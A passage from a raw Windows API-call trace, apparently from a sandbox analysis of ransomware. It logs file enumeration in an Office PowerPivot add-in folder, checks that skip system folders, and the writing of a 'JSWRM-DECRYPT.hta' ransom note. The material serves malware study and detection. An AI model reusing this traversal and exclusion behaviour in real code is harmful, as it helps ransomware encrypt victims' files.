cFileName="Microsoft.SqlServer.Types.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0126.799] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2=".") returned 1 [0126.799] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="..") returned 1 [0126.799] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="...") returned 1 [0126.799] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="windows") returned -1 [0126.799] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="recovery") returned -1 [0126.799] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="perflogs") returned -1 [0126.799] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="documents and settings") returned 1 [0126.799] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.799] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="system volume information") returned -1 [0126.799] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.resources.dll", lpString2="msocache") returned -1 [0126.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0126.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0126.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0126.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0126.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0126.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d298, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0126.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0126.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0126.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0126.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0126.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.799] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9e7d566, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9e7d566, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9e7d566, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x28c0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 1 [0126.799] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2=".") returned 1 [0126.799] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="..") returned 1 [0126.800] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="...") returned 1 [0126.800] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="windows") returned -1 [0126.800] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="recovery") returned 1 [0126.800] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="perflogs") returned 1 [0126.800] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="documents and settings") returned 1 [0126.800] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.800] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="system volume information") returned -1 [0126.800] lstrcmpiW (lpString1="ReportingServicesNativeClient.resources.dll", lpString2="msocache") returned 1 [0126.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0126.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0126.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0126.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0126.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReportingServicesNativeClient.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReportingServicesNativeClient.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0126.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0126.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1ef7e0 [0126.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0126.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.800] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9e7d566, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9e7d566, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9e7d566, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x28c0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ReportingServicesNativeClient.resources.dll", cAlternateFileName="REPORT~1.DLL")) returned 0 [0126.800] FindClose (in: hFindFile=0x231bc0 | out: hFindFile=0x231bc0) returned 1 [0126.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ef7e0 | out: hHeap=0x1e0000) returned 1 [0126.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0126.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0126.800] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5ad675f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5ad675f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5ad675f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6faa8, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="OFFICE.DLL", cAlternateFileName="")) returned 1 [0126.800] lstrcmpiW (lpString1="OFFICE.DLL", lpString2=".") returned 1 [0126.800] lstrcmpiW (lpString1="OFFICE.DLL", lpString2="..") returned 1 [0126.800] lstrcmpiW (lpString1="OFFICE.DLL", lpString2="...") returned 1 [0126.800] lstrcmpiW (lpString1="OFFICE.DLL", lpString2="windows") returned -1 [0126.800] lstrcmpiW (lpString1="OFFICE.DLL", lpString2="recovery") returned -1 [0126.800] lstrcmpiW (lpString1="OFFICE.DLL", lpString2="perflogs") returned -1 [0126.801] lstrcmpiW (lpString1="OFFICE.DLL", lpString2="documents and settings") returned 1 [0126.801] lstrcmpiW (lpString1="OFFICE.DLL", lpString2="$RECYCLE.BIN") returned 1 [0126.801] lstrcmpiW (lpString1="OFFICE.DLL", lpString2="system volume information") returned -1 [0126.801] lstrcmpiW (lpString1="OFFICE.DLL", lpString2="msocache") returned 1 [0126.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0126.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OFFICE.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0126.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OFFICE.DLL", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OFFICE.DLL", lpUsedDefaultChar=0x0) returned 10 [0126.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0126.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0126.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OFFICE.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0126.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OFFICE.DLL", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OFFICE.DLL", lpUsedDefaultChar=0x0) returned 10 [0126.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0126.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0126.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0126.801] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167cf4d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="pl", cAlternateFileName="")) returned 1 [0126.801] lstrcmpiW (lpString1="pl", lpString2=".") returned 1 [0126.801] lstrcmpiW (lpString1="pl", lpString2="..") returned 1 [0126.801] lstrcmpiW (lpString1="pl", lpString2="...") returned 1 [0126.801] lstrcmpiW (lpString1="pl", lpString2="windows") returned -1 [0126.801] lstrcmpiW (lpString1="pl", lpString2="recovery") returned -1 [0126.801] lstrcmpiW (lpString1="pl", lpString2="perflogs") returned 1 [0126.801] lstrcmpiW (lpString1="pl", lpString2="documents and settings") returned 1 [0126.801] lstrcmpiW (lpString1="pl", lpString2="$RECYCLE.BIN") returned 1 [0126.801] lstrcmpiW (lpString1="pl", lpString2="system volume information") returned -1 [0126.801] lstrcmpiW (lpString1="pl", lpString2="msocache") returned 1 [0126.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0126.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0126.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0126.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0126.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0126.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0126.801] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\pl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\pl\\jswrm-decrypt.hta")) returned 0xffffffff [0126.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0126.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0126.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x278330 [0126.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0126.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x27a100 [0126.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0126.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0126.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0126.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\pl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\pl\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0126.804] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.804] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.827] CloseHandle (hObject=0x314) returned 1 [0126.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0126.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27a100 | out: hHeap=0x1e0000) returned 1 [0126.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0126.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0126.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0126.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0126.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0126.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0126.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0126.827] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\pl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\pl\\jswrm-decrypt.hta")) returned 0x20 [0126.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0126.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0126.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0126.827] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\pl\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x423dda37, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232240 [0126.827] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0126.827] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x423dda37, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0126.827] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0126.828] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0126.828] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x423dda37, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x423dda37, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x42429f10, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.828] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0126.828] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0126.828] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0126.828] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0126.828] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0126.828] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0126.828] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0126.828] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0126.828] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0126.828] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0126.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0126.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0126.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0126.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0126.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0126.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0126.828] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x167cf4d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167cf4d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11c6, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="LocalizedStrings.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0126.828] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2=".") returned 1 [0126.828] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="..") returned 1 [0126.828] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="...") returned 1 [0126.828] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="windows") returned -1 [0126.828] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="recovery") returned -1 [0126.828] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="perflogs") returned -1 [0126.828] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="documents and settings") returned 1 [0126.828] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="$RECYCLE.BIN") returned 1 [0126.829] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="system volume information") returned -1 [0126.829] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="msocache") returned -1 [0126.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0126.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x241308, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0126.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x241128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f1b0 [0126.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0126.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, 